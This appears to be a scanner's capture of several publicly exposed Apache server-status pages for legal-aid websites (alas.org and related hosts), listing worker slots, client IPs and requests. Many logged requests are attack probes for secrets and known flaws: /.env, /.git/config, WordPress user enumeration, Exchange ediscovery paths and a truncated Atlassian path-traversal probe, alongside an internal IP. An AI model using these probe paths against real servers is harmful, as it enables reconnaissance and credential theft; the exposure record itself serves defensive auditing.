2-54282791/21/138689K 2.38101.00.406786.84 70.132.63.132http/1.1elearning.alas.org:8080GET /info.php HTTP/1.1 3-54284440/2/138058W 0.49300.00.006843.67 70.132.63.132http/1.1events.alas.org:8080GET / HTTP/1.1 4-54284515/5/132814K 1.1810233.10.236872.41 70.132.63.132http/1.1short.alas.org:8080GET /config.json HTTP/1.1 5-54277790/74/127549W 5.68400.01.886305.79 70.132.63.132http/1.1events.alas.org:8080GET / HTTP/1.1 6-54284279/12/123207K 1.972042.40.156154.80 70.132.63.132http/1.1short.alas.org:8080GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 7-54279607/55/116763K 5.532051.81.125991.82 70.132.63.132http/1.1short.alas.org:8080GET /telescope/requests HTTP/1.1 8-54284280/7/111211W 2.40000.00.015413.78 70.132.63.80http/1.1survey.alas.org:8080GET / HTTP/1.1 9-54284528/8/109799W 0.5330113.60.115360.51 70.132.63.132http/1.1elearning.alas.org:8080GET / HTTP/1.1 10-54284613/3/103116W 0.435066.60.074844.78 70.132.63.132http/1.1intranet.alas.org:8080GET /server-status HTTP/1.1 11-54284627/7/90826K 0.470360871.20.074417.13 70.132.63.132http/1.1elearning.alas.org:8080GET / HTTP/1.1 12-54284631/6/81750K 0.700482.30.084061.28 70.132.63.80http/1.1esign.alas.org:8080GET /.DS_Store HTTP/1.1 13-54283945/10/76025K 1.21206.60.023612.14 70.132.63.132http/1.1short.alas.org:8080GET /telescope/requests HTTP/1.1 14-54277906/74/71384W 5.785047.53.213477.89 70.132.63.132http/1.1events.alas.org:8080GET / HTTP/1.1 15-542846411/11/68079K 0.302080.40.083513.42 70.132.63.132http/1.1short.alas.org:8080GET /.git/config HTTP/1.1 16-54284810/2/58813W 0.74000.00.032692.83 70.132.63.165http/1.1events.alas.org:8080GET /s/31332e3232342e3138392e3734/_/;/META-INF/maven/com.atlass 17-54283050/14/48131W 1.34400.00.462319.79 70.132.63.80http/1.1intranet.alas.org:8080GET / HTTP/1.1 18-54284821/1/44101W 0.00501.00.002305.00 70.132.63.132http/1.1intranet.alas.org:8080GET /.DS_Store HTTP/1.1 19-54284830/3/40557W 0.69200.00.211989.78 70.132.63.132http/1.1intranet.alas.org:8080GET / HTTP/1.1 20-54284881/3/41158K 0.54010.80.002010.74 130.176.29.140http/1.1legalaidconnections.org:8080HEAD / HTTP/1.1 21-54284898/8/35250K 0.202010.80.011733.90 70.132.63.132http/1.1short.alas.org:8080GET /.git/config HTTP/1.1 22-54284901/3/38397K 0.53001.00.001750.94 70.132.63.165http/1.1elearning.alas.org:8080GET /info.php HTTP/1.1 23-54284911/1/34535W 0.6830228.60.221616.61 70.132.63.132http/1.1events.alas.org:8080GET /?rest_route=/wp/v2/users/ HTTP/1.1 24-54284926/6/31221W 0.110052.60.051522.00 70.132.63.132http/1.1intranet.alas.org:8080GET /login.action HTTP/1.1 25-54285217/7/16889K 0.092048.80.05728.46 70.132.63.132http/1.1short.alas.org:8080GET /?rest_route=/wp/v2/users/ HTTP/1.1 26-54285228/8/11332K 0.100452.80.05570.89 70.132.63.132http/1.1esign.alas.org:8080GET /.env HTTP/1.1 27-54285237/7/11705K 0.01107.30.01472.32 70.132.63.132http/1.1elearning.alas.org:8080GET /login.action HTTP/1.1 28-54285240/0/9875W 0.00500.00.00430.06 70.132.63.132http/1.1intranet.alas.org:8080GET / HTTP/1.1 29-54285254/4/9779K 0.242043.20.04403.59 70.132.63.132http/1.1short.alas.org:8080GET /.env HTTP/1.1 30-54285264/4/10666K 0.31198048.90.05492.76 70.132.63.132http/1.1survey.alas.org:8080GET /config.json HTTP/1.1 31-54285273/3/9052K 0.331116475.80.07376.45 70.132.63.132http/1.1survey.alas.org:8080GET / HTTP/1.1 32-54285284/4/10171K 0.09013210.70.01452.29 70.132.63.80http/1.1esign.alas.org:8080GET /s/31332e3232342e3138392e3436/_/;/META-INF/maven/com.atlass 33-54285331/1/10592W 0.00501.00.00457.74 70.132.63.132http/1.1intranet.alas.org:8080GET /login.action HTTP/1.1 34-54285341/1/10172W 0.00501.00.00466.71 70.132.63.132http/1.1intranet.alas.org:8080GET /config.json HTTP/1.1 35-54285590/0/10772W 0.00500.00.00445.08 70.132.63.80http/1.1events.alas.org:8080GET / HTTP/1.1 36-54285680/0/9039W 0.00500.00.00379.18 70.132.63.80http/1.1intranet.alas.org:8080GET / HTTP/1.1 37-54285690/0/10086W 0.00500.00.00404.90 70.132.63.132http/1.1intranet.alas.org:8080GET / HTTP/1.1 38-54285701/1/8215W 0.00301.00.00401.48 70.132.63.80http/1.1events.alas.org:8080GET /.DS_Store HTTP/1.1 39-54285910/0/9918W 0.00500.00.00383.60 70.132.63.132http/1.1events.alas.org:8080GET / HTTP/1.1 40-54285924/4/10175K 0.271122545.70.04360.73 70.132.63.165http/1.1survey.alas.org:8080GET / HTTP/1.1 41-54286011/2/2151K 0.23101.10.0278.69 70.132.63.80http/1.1short.alas.org:8080GET / HTTP/1.1 42-54286020/0/1042W 0.00400.00.0040.24 70.132.63.80http/1.1intranet.alas.org:8080GET / HTTP/1.1 43-54286030/3/1037W 0.18100.00.0144.99 70.132.63.165http/1.1survey.alas.org:8080GET / HTTP/1.1 44-54286040/0/631W 0.00400.00.0071.13 70.132.63.165http/1.1events.alas.org:8080GET / HTTP/1.1 45-54286050/0/987W 0.00400.00.0052.93 70.132.63.165http/1.1intranet.alas.org:8080GET / HTTP/1.1 46-54286061/1/683W 0.00301.10.0017.14 70.132.63.132http/1.1events.alas.org:8080GET /telescope/requests HTTP/1.1 47-54286073/3/1012K 0.091043.40.0446.80 70.132.63.132http/1.1on.alas.org:8080GET /login.action HTTP/1.1 48-54286080/1/686W 0.23100.00.0220.89 70.132.63.80http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 49-54286094/4/698K 0.11014345.70.0421.45 70.132.63.132http/1.1esign.alas.org:8080GET /telescope/requests HTTP/1.1 50-54286107/7/630K 0.00107.30.0128.45 70.132.63.132http/1.1short.alas.org:8080GET /login.action HTTP/1.1 51-54286432/2/740W 0.052028.40.0327.28 70.132.63.132http/1.1events.alas.org:8080GET / HTTP/1.1 52-54286484/4/683K 0.05262631.40.0321.07 70.132.63.132http/1.1on.alas.org:8080GET /info.php HTTP/1.1 53-54286497/7/501K 0.0301411.10.0120.15 70.132.63.132http/1.1esign.alas.org:8080
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb312a30b0212a30b021c05e6ea2
Apache Status Apache Server Status for short.alas.org (via 172.26.19.211) Server Version: Apache/2.4.29 (Ubuntu) Server MPM: prefork Server Built: 2022-06-23T12:51:37 Current Time: Thursday, 18-Aug-2022 00:05:55 UTC Restart Time: Friday, 24-Jun-2022 06:43:41 UTC Parent Server Config. Generation: 55 Parent Server MPM Generation: 54 Server uptime: 54 days 17 hours 22 minutes 14 seconds Server load: 4.64 0.98 0.31 Total accesses: 2348142 - Total Traffic: 111.6 GB CPU Usage: u45.08 s5.35 cu0 cs0 - .00107% CPU load .497 requests/sec - 24.8 kB/second - 49.9 kB/request 105 requests currently being processed, 0 idle workers KKWWKWKKWWWWWKWKWWWWWKWWKKKKWKWWKWWWWWWWWWWWWWWKWKKWKKWWWWWWWWWK WKWWKWKKKWKKKKKKKKWWKKKKKWKKWKKWKKKKWWKKK....................... ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-542843910/11/149114K 1.050043.80.117129.90 70.132.63.132http/1.1short.alas.org:8080GET / HTTP/1.1 1-54282743/22/146311K 0.700043.60.477406.38 70.132.63.132http/1.1short.alas.org:8080GET / HTTP/1.1 2-54282795/19/138687W 2.17208.80.376786.81 70.132.63.132http/1.1elearning.alas.org:8080GET / HTTP/1.1 3-54284440/2/138058W 0.49100.00.006843.67 70.132.63.132http/1.1events.alas.org:8080GET / HTTP/1.1 4-54284514/4/132813K 1.1803541232.10.236872.41 70.132.63.132http/1.1intranet.alas.org:8080GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 5-54277790/74/127549W 5.68200.01.886305.79 70.132.63.132http/1.1events.alas.org:8080GET / HTTP/1.1 6-54284278/11/123206K 1.970041.30.156154.80 70.132.63.132http/1.1secure.alas.org:8080GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 7-54279607/55/116763K 5.530051.81.125991.82 70.132.63.132http/1.1short.alas.org:8080GET /telescope/requests HTTP/1.1 8-54284282/6/111210W 1.93302.00.015413.77 70.132.63.132http/1.1intranet.alas.org:8080GET /s/31332e3232342e3138392e3734/_/;/META-INF/maven/com.atlass 9-54284528/8/109799W 0.5310113.60.115360.51 70.132.63.132http/1.1elearning.alas.org:8080GET / HTTP/1.1 10-54284613/3/103116W 0.433066.60.074844.78 70.132.63.132http/1.1intranet.alas.org:8080GET /server-status HTTP/1.1 11-54284626/6/90825W 0.241038.70.044417.10 70.132.63.132http/1.1elearning.alas.org:8080GET / HTTP/1.1 12-54284634/4/81748W 0.471044.80.044061.24 70.132.63.132http/1.1elearning.alas.org:8080GET / HTTP/1.1 13-54283944/9/76024K 1.21005.60.023612.14 70.132.63.132http/1.1secure.alas.org:8080GET /.git/config HTTP/1.1 14-54277906/74/71384W 5.783047.53.213477.89 70.132.63.132http/1.1events.alas.org:8080GET / HTTP/1.1 15-542846410/10/68078K 0.300079.40.083513.42 70.132.63.132http/1.1secure.alas.org:8080GET /.DS_Store HTTP/1.1 16-54284811/1/58812W 0.213032.10.032692.83 70.132.63.132http/1.1intranet.alas.org:8080GET /telescope/requests HTTP/1.1 17-54283050/14/48131W 1.34200.00.462319.79 70.132.63.80http/1.1intranet.alas.org:8080GET / HTTP/1.1 18-54284821/1/44101W 0.00301.00.002305.00 70.132.63.132http/1.1intranet.alas.org:8080GET /.DS_Store HTTP/1.1 19-54284830/3/40557W 0.69000.00.211989.78 70.132.63.132http/1.1intranet.alas.org:8080GET / HTTP/1.1 20-54284881/1/41156W 0.00301.00.002010.74 70.132.63.132http/1.1intranet.alas.org:8080GET /?rest_route=/wp/v2/users/ HTTP/1.1 21-54284897/7/35249K 0.20009.80.011733.90 70.132.63.132http/1.1secure.alas.org:8080GET /telescope/requests HTTP/1.1 22-54284901/1/38395W 0.00301.40.001750.94 70.132.63.132http/1.1intranet.alas.org:8080GET /.env HTTP/1.1 23-54284911/1/34535W 0.6810228.60.221616.61 70.132.63.132http/1.1events.alas.org:8080GET /?rest_route=/wp/v2/users/ HTTP/1.1 24-54284926/6/31221K 0.110124052.60.051522.00 70.132.63.132http/1.1survey.alas.org:8080GET / HTTP/1.1 25-54285216/6/16888K 0.090047.70.05728.46 70.132.63.132http/1.1secure.alas.org:8080GET /info.php HTTP/1.1 26-54285227/7/11331K 0.100050.80.05570.89 70.132.63.132http/1.1short.alas.org:8080GET /?rest_route=/wp/v2/users/ HTTP/1.1 27-54285236/6/11704K 0.01006.30.01472.32 70.132.63.132http/1.1short.alas.org:8080GET /telescope/requests HTTP/1.1 28-54285240/0/9875W 0.00300.00.00430.06 70.132.63.132http/1.1intranet.alas.org:8080GET / HTTP/1.1 29-54285254/4/9779K 0.240043.20.04403.59 70.132.63.132http/1.1short.alas.org:8080GET /.env HTTP/1.1 30-54285263/3/10665W 0.240043.10.04492.75 70.132.63.132http/1.1survey.alas.org:8080GET /config.json HTTP/1.1 31-54285272/2/9051W 0.240034.40.03376.41 70.132.63.132http/1.1survey.alas.org:8080GET / HTTP/1.1 32-54285282/2/10169K 0.08012337.30.01452.29 70.132.63.80http/1.1survey.alas.org:8080GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 33-54285331/1/10592W 0.00301.00.00457.74 70.132.63.132http/1.1intranet.alas.org:8080GET /login.action HTTP/1.1 34-54285341/1/10172W 0.00301.00.00466.71 70.132.63.132http/1.1intranet.alas.org:8080GET /config.json HTTP/1.1 35-54285590/0/10772W 0.00300.00.00445.08 70.132.63.80http/1.1events.alas.org:8080GET / HTTP/1.1 36-54285680/0/9039W 0.00300.00.00379.18 70.132.63.80http/1.1intranet.alas.org:8080GET / HTTP/1.1 37-54285690/0/10086W 0.00300.00.00404.90 70.132.63.132http/1.1intranet.alas.org:8080GET / HTTP/1.1 38-54285701/1/8215W 0.00101.00.00401.48 70.132.63.80http/1.1events.alas.org:8080GET /.DS_Store HTTP/1.1 39-54285910/0/9918W 0.00300.00.00383.60 70.132.63.132http/1.1events.alas.org:8080GET / HTTP/1.1 40-54285923/3/10174W 0.19004.30.00360.69 70.132.63.165http/1.1survey.alas.org:8080GET / HTTP/1.1 41-54286010/0/2149W 0.00200.00.0078.67 70.132.63.132http/1.1elearning.alas.org:8080GET / HTTP/1.1 42-54286020/0/1042W 0.00200.00.0040.24 70.132.63.80http/1.1intranet.alas.org:8080GET / HTTP/1.1 43-54286030/0/1034W 0.00200.00.0044.98 70.132.63.132http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 44-54286040/0/631W 0.00200.00.0071.13 70.132.63.165http/1.1events.alas.org:8080GET / HTTP/1.1 45-54286050/0/987W 0.00200.00.0052.93 70.132.63.165http/1.1intranet.alas.org:8080GET / HTTP/1.1 46-54286061/1/683W 0.00101.10.0017.14 70.132.63.132http/1.1events.alas.org:8080GET /telescope/requests HTTP/1.1 47-54286072/2/1011K 0.090042.40.0446.80 70.132.63.132http/1.1short.alas.org:8080GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 48-54286080/0/685W 0.00200.00.0020.87 70.132.63.132http/1.1elearning.alas.org:8080GET / HTTP/1.1 49-54286093/3/697K 0.090043.40.0421.45 70.132.63.132http/1.1short.alas.org:8080GET /s/31332e3232342e3138392e3236/_/;/META-INF/maven/com.atlass 50-54286106/6/629K 0.00006.30.0128.44 70.132.63.132http/1.1short.alas.org:8080GET /.git/config HTTP/1.1 51-54286432/2/740W 0.050028.40.0327.28 70.132.63.132http/1.1events.alas.org:8080GET / HTTP/1.1 52-54286484/4/683K 0.05062631.40.0321.07 70.132.63.132http/1.1on.alas.org:8080GET /info.php HTTP/1.1 53-54286496/6/500K 0.02008.8
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb312a30b0212a30b02167906879
Apache Status Apache Server Status for short.alas.org (via 172.26.19.211) Server Version: Apache/2.4.29 (Ubuntu) Server MPM: prefork Server Built: 2022-06-23T12:51:37 Current Time: Thursday, 18-Aug-2022 00:05:55 UTC Restart Time: Friday, 24-Jun-2022 06:43:41 UTC Parent Server Config. Generation: 55 Parent Server MPM Generation: 54 Server uptime: 54 days 17 hours 22 minutes 14 seconds Server load: 4.64 0.98 0.31 Total accesses: 2348130 - Total Traffic: 111.6 GB CPU Usage: u45.07 s5.35 cu0 cs0 - .00107% CPU load .497 requests/sec - 24.8 kB/second - 49.9 kB/request 105 requests currently being processed, 0 idle workers KKWWKWKKWWWWWKWKWWWWWKWWKKKKWKKWKWWWWWWWWWWWWWWKWKKWKKWWWWWWWWWK WKWWKWKKKWKKKKKWKKWWKKKKKKKKWKKWKKKKKWKKK....................... ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process <SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-542843910/11/149114K 1.050043.80.117129.90 70.132.63.132http/1.1short.alas.org:8080GET / HTTP/1.1 1-54282743/22/146311K 0.700043.60.477406.38 70.132.63.132http/1.1short.alas.org:8080GET / HTTP/1.1 2-54282795/19/138687W 2.17208.80.376786.81 70.132.63.132http/1.1elearning.alas.org:8080GET / HTTP/1.1 3-54284440/2/138058W 0.49100.00.006843.67 70.132.63.132http/1.1events.alas.org:8080GET / HTTP/1.1 4-54284514/4/132813K 1.1803541232.10.236872.41 70.132.63.132http/1.1intranet.alas.org:8080GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 5-54277790/74/127549W 5.68200.01.886305.79 70.132.63.132http/1.1events.alas.org:8080GET / HTTP/1.1 6-54284278/11/123206K 1.970041.30.156154.80 70.132.63.132http/1.1secure.alas.org:8080GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 7-54279606/54/116762K 5.530050.81.125991.82 70.132.63.132http/1.1on.alas.org:8080GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 8-54284282/6/111210W 1.93302.00.015413.77 70.132.63.132http/1.1intranet.alas.org:8080GET /s/31332e3232342e3138392e3734/_/;/META-INF/maven/com.atlass 9-54284528/8/109799W 0.5310113.60.115360.51 70.132.63.132http/1.1elearning.alas.org:8080GET / HTTP/1.1 10-54284613/3/103116W 0.433066.60.074844.78 70.132.63.132http/1.1intranet.alas.org:8080GET /server-status HTTP/1.1 11-54284626/6/90825W 0.241038.70.044417.10 70.132.63.132http/1.1elearning.alas.org:8080GET / HTTP/1.1 12-54284634/4/81748W 0.471044.80.044061.24 70.132.63.132http/1.1elearning.alas.org:8080GET / HTTP/1.1 13-54283944/9/76024K 1.21005.60.023612.14 70.132.63.132http/1.1secure.alas.org:8080GET /.git/config HTTP/1.1 14-54277906/74/71384W 5.783047.53.213477.89 70.132.63.132http/1.1events.alas.org:8080GET / HTTP/1.1 15-542846410/10/68078K 0.300079.40.083513.42 70.132.63.132http/1.1secure.alas.org:8080GET /.DS_Store HTTP/1.1 16-54284811/1/58812W 0.213032.10.032692.83 70.132.63.132http/1.1intranet.alas.org:8080GET /telescope/requests HTTP/1.1 17-54283050/14/48131W 1.34200.00.462319.79 70.132.63.80http/1.1intranet.alas.org:8080GET / HTTP/1.1 18-54284821/1/44101W 0.00301.00.002305.00 70.132.63.132http/1.1intranet.alas.org:8080GET /.DS_Store HTTP/1.1 19-54284830/3/40557W 0.69000.00.211989.78 70.132.63.132http/1.1intranet.alas.org:8080GET / HTTP/1.1 20-54284881/1/41156W 0.00301.00.002010.74 70.132.63.132http/1.1intranet.alas.org:8080GET /?rest_route=/wp/v2/users/ HTTP/1.1 21-54284897/7/35249K 0.20009.80.011733.90 70.132.63.132http/1.1secure.alas.org:8080GET /telescope/requests HTTP/1.1 22-54284901/1/38395W 0.00301.40.001750.94 70.132.63.132http/1.1intranet.alas.org:8080GET /.env HTTP/1.1 23-54284911/1/34535W 0.6810228.60.221616.61 70.132.63.132http/1.1events.alas.org:8080GET /?rest_route=/wp/v2/users/ HTTP/1.1 24-54284926/6/31221K 0.110124052.60.051522.00 70.132.63.132http/1.1survey.alas.org:8080GET / HTTP/1.1 25-54285216/6/16888K 0.090047.70.05728.46 70.132.63.132http/1.1secure.alas.org:8080GET /info.php HTTP/1.1 26-54285226/6/11330K 0.100049.80.05570.89 70.132.63.132http/1.1secure.alas.org:8080GET /.env HTTP/1.1 27-54285236/6/11704K 0.01006.30.01472.32 70.132.63.132http/1.1short.alas.org:8080GET /telescope/requests HTTP/1.1 28-54285240/0/9875W 0.00300.00.00430.06 70.132.63.132http/1.1intranet.alas.org:8080GET / HTTP/1.1 29-54285253/3/9778K 0.240038.80.04403.59 70.132.63.132http/1.1on.alas.org:8080GET /.env HTTP/1.1 30-54285263/3/10665K 0.240143.10.04492.75 70.132.63.132http/1.1secure.alas.org:8080GET /server-status HTTP/1.1 31-54285272/2/9051W 0.240034.40.03376.41 70.132.63.132http/1.1survey.alas.org:8080GET / HTTP/1.1 32-54285282/2/10169K 0.08012337.30.01452.29 70.132.63.80http/1.1survey.alas.org:8080GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 33-54285331/1/10592W 0.00301.00.00457.74 70.132.63.132http/1.1intranet.alas.org:8080GET /login.action HTTP/1.1 34-54285341/1/10172W 0.00301.00.00466.71 70.132.63.132http/1.1intranet.alas.org:8080GET /config.json HTTP/1.1 35-54285590/0/10772W 0.00300.00.00445.08 70.132.63.80http/1.1events.alas.org:8080GET / HTTP/1.1 36-54285680/0/9039W 0.00300.00.00379.18 70.132.63.80http/1.1intranet.alas.org:8080GET / HTTP/1.1 37-54285690/0/10086W 0.00300.00.00404.90 70.132.63.132http/1.1intranet.alas.org:8080GET / HTTP/1.1 38-54285701/1/8215W 0.00101.00.00401.48 70.132.63.80http/1.1events.alas.org:8080GET /.DS_Store HTTP/1.1 39-54285910/0/9918W 0.00300.00.00383.60 70.132.63.132http/1.1events.alas.org:8080GET / HTTP/1.1 40-54285923/3/10174W 0.19004.30.00360.69 70.132.63.165http/1.1survey.alas.org:8080GET / HTTP/1.1 41-54286010/0/2149W 0.00200.00.0078.67 70.132.63.132http/1.1elearning.alas.org:8080GET / HTTP/1.1 42-54286020/0/1042W 0.00200.00.0040.24 70.132.63.80http/1.1intranet.alas.org:8080GET / HTTP/1.1 43-54286030/0/1034W 0.00200.00.0044.98 70.132.63.132http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 44-54286040/0/631W 0.00200.00.0071.13 70.132.63.165http/1.1events.alas.org:8080GET / HTTP/1.1 45-54286050/0/987W 0.00200.00.0052.93 70.132.63.165http/1.1intranet.alas.org:8080GET / HTTP/1.1 46-54286061/1/683W 0.00101.10.0017.14 70.132.63.132http/1.1events.alas.org:8080GET /telescope/requests HTTP/1.1 47-54286072/2/1011K 0.090042.40.0446.80 70.132.63.132http/1.1short.alas.org:8080GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 48-54286080/0/685W 0.00200.00.0020.87 70.132.63.132http/1.1elearning.alas.org:8080GET / HTTP/1.1 49-54286092/2/696K 0.090042.30.0421.45 70.132.63.132http/1.1on.alas.org:8080GET /config.json HTTP/1.1 50-54286106/6/629K 0.00006.30.0128.44 70.132.63.132http/1.1short.alas.org:8080GET /.git/config HTTP/1.1 51-54286432/2/740W 0.050028.40.0327.28 70.132.63.132http/1.1events.alas.org:8080GET / HTTP/1.1 52-54286484/4/683K 0.05062631.40.0321.07 70.132.63.132http/1.1on.alas.org:8080GET /info.php HTTP/1.1 53-54286495/5/499K 0.02007.80.0120.14
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb312a30b0212a30b02143a95082
Apache Status Apache Server Status for short.alas.org (via 172.26.19.211) Server Version: Apache/2.4.29 (Ubuntu) Server MPM: prefork Server Built: 2022-03-16T16:53:42 Current Time: Sunday, 19-Jun-2022 00:05:03 UTC Restart Time: Saturday, 19-Mar-2022 06:12:47 UTC Parent Server Config. Generation: 93 Parent Server MPM Generation: 92 Server uptime: 91 days 17 hours 52 minutes 16 seconds Server load: 2.34 0.50 0.16 Total accesses: 4334786 - Total Traffic: 195.9 GB CPU Usage: u82.51 s9.09 cu0 cs0 - .00116% CPU load .547 requests/sec - 25.9 kB/second - 47.4 kB/request 116 requests currently being processed, 0 idle workers WWKWWWWKWKWKWWWKKWKWKWKWWWWKWWWWKWWKKWWWKKKWWWKWWWWWWWKWWWWWWWWW WWWWWKKWWWWWWWWWWWWWWWWWWWWKWWWWKWWWWWKWKWKWKWWWWWKSWSSSSSSSS... ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-92123209/9/276504W 0.9400329.20.3213138.20 70.132.1.80http/1.1gwinnettfamilylawclinic.org:808GET /config.json HTTP/1.1 1-92123252/4/270925W 0.74105.90.1312701.96 70.132.1.80http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 2-921232610/10/266322K 0.270805173.60.1712755.86 70.132.1.80http/1.1gwinnettfamilylawclinic.org:808GET /?rest_route=/wp/v2/users/ HTTP/1.1 3-92121690/5/252876W 0.13300.00.0111597.38 70.132.1.80http/1.1events.alas.org:8080GET / HTTP/1.1 4-92119270/43/245955W 3.10300.01.2411161.78 70.132.1.81http/1.1intranet.alas.org:8080GET / HTTP/1.1 5-92121784/7/236735W 0.8700227.50.2310921.86 70.132.1.80http/1.1events.alas.org:8080GET /login.action HTTP/1.1 6-92123350/2/223982W 0.74100.00.2410562.99 70.132.1.80http/1.1survey.alas.org:8080GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 7-92123368/8/216036K 0.2911376136.90.1310106.22 70.132.1.80http/1.1gwinnettfamilylawclinic.org:808GET / HTTP/1.1 8-92116186/87/207396W 5.4730300.23.949424.85 70.132.1.80http/1.1events.alas.org:8080GET / HTTP/1.1 9-92123378/8/196842K 0.310617101.90.109262.71 70.132.1.80http/1.1gwinnettfamilylawclinic.org:808GET /info.php HTTP/1.1 10-92119280/36/183428W 2.84200.00.818455.35 70.132.1.139http/1.1events.alas.org:8080GET /telescope/requests HTTP/1.1 11-92121791/8/164366K 1.37001.00.497892.37 70.132.1.80http/1.1survey.alas.org:8080GET /.env HTTP/1.1 12-92123385/5/158055W 0.263014.30.017066.27 70.132.1.80http/1.1events.alas.org:8080GET /config.json HTTP/1.1 13-92123550/0/153076W 2.36500.00.007022.61 70.132.1.80http/1.1events.alas.org:8080GET / HTTP/1.1 14-92121890/8/142084W 0.94200.00.176207.77 70.132.1.139http/1.1events.alas.org:8080GET /s/3134332e3230342e38392e3233/_/;/META-INF/maven/com.atlass 15-92123561/6/121090K 0.20101.00.135772.60 70.132.1.81http/1.1survey.alas.org:8080GET /.DS_Store HTTP/1.1 16-92121983/6/107513K 1.321571233.60.245179.97 70.132.1.80http/1.1gwinnettfamilylawclinic.org:808GET /.env HTTP/1.1 17-92121990/3/92551W 0.08400.00.014262.09 70.132.1.80http/1.1intranet.alas.org:8080GET / HTTP/1.1 18-92123578/8/81021K 0.11086492.20.093482.35 70.132.1.80http/1.1gwinnettfamilylawclinic.org:808GET /server-status HTTP/1.1 19-92122090/5/79017W 0.14200.00.043620.28 70.132.1.80http/1.1events.alas.org:8080GET /?rest_route=/wp/v2/users/ HTTP/1.1 20-92123587/7/77297K 0.181695101.60.103566.77 70.132.1.80http/1.1gwinnettfamilylawclinic.org:808GET /info.php HTTP/1.1 21-92123590/1/74261W 0.51000.00.003257.78 70.132.1.139http/1.1on.alas.org:8080GET /info.php HTTP/1.1 22-92123604/4/70344K 0.26096578.60.083161.99 70.132.1.139http/1.1gwinnettfamilylawclinic.org:808GET /.DS_Store HTTP/1.1 23-92122205/8/66673W 1.270078.70.082933.60 70.132.1.80http/1.1events.alas.org:8080GET /config.json HTTP/1.1 24-92123610/5/57315W 0.28000.00.172564.22 70.132.1.80http/1.1survey.alas.org:8080GET / HTTP/1.1 25-92123625/5/24584W 0.3000248.00.241165.47 70.132.1.80http/1.1gwinnettfamilylawclinic.org:808GET /login.action HTTP/1.1 26-92123950/0/18935W 0.00400.00.00848.13 70.132.1.80http/1.1intranet.alas.org:8080GET / HTTP/1.1 27-92122446/9/19674K 0.900752127.10.13900.15 70.132.1.80http/1.1gwinnettfamilylawclinic.org:808GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 28-92123960/0/16956W 0.00400.00.00915.17 70.132.1.80http/1.1intranet.alas.org:8080GET / HTTP/1.1 29-92123970/0/16250W 0.00400.00.00836.49 70.132.1.80http/1.1intranet.alas.org:8080GET / HTTP/1.1 30-92123980/0/18130W 0.00400.00.00736.69 70.132.1.80http/1.1events.alas.org:8080GET / HTTP/1.1 31-92123990/0/16362W 0.04400.00.00783.79 70.132.1.80http/1.1intranet.alas.org:8080GET / HTTP/1.1 32-92124005/5/14851K 0.10073185.90.08681.41 70.132.1.80http/1.1gwinnettfamilylawclinic.org:808GET /.DS_Store HTTP/1.1 33-92122710/7/16380W 1.13000.00.26735.85 70.132.1.80http/1.1survey.alas.org:8080GET /server-status HTTP/1.1 34-92122750/6/15960W 0.92300.00.08756.48 70.132.1.80http/1.1intranet.alas.org:8080GET / HTTP/1.1 35-92122804/6/16368K 1.270752378.10.38876.29 70.132.1.80http/1.1gwinnettfamilylawclinic.org:808GET /.DS_Store HTTP/1.1 36-92124014/4/14654K 0.200794127.10.12644.51 70.132.1.81http/1.1gwinnettfamilylawclinic.org:808GET /?rest_route=/wp/v2/users/ HTTP/1.1 37-92122903/5/14866W 1.2800377.00.37641.84 70.132.1.80http/1.1gwinnettfamilylawclinic.org:808GET / HTTP/1.1 38-92122954/6/15349W 1.0200227.40.22663.28 70.132.1.80http/1.1gwinnettfamilylawclinic.org:808GET / HTTP/1.1 39-92123004/6/15722W 1.8200378.00.37658.34 70.132.1.80http/1.1events.alas.org:8080GET /config.json HTTP/1.1 40-92123053/4/13796K 1.291521377.10.37631.45 70.132.1.80http/1.1gwinnettfamilylawclinic.org:808GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 41-92124026/6/3737K 0.06145213.20.01138.20 70.132.1.139http/1.1gwinnettfamilylawclinic.org:808GET /.env HTTP/1.1 42-92124035/5/2037K 0.11075085.90.0895.66 70.132.1.81http/1.1gwinnettfamilylawclinic.org:808GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 43-92124040/0/2110W 3.73400.00.0079.40 70.132.1.80http/1.1intranet.alas.org:8080GET / HTTP/1.1 44-92124450/0/1440W 0.41400.00.0061.08 70.132.1.80http/1.1intranet.alas.org:8080GET / HTTP/1.1 45-92124463/3/1569W 0.01306.70.0161.35 70.132.1.80http/1.1events.alas.org:8080GET /login.action HTTP/1.1 46-92124471/6/968K 0.13001.10.1339.01 70.132.1.139http/1.1short.alas.org:8080GET /s/3134332e3230342e38392e3932/_/;/META-INF/maven/com.atlass 47-92124484/4/947W 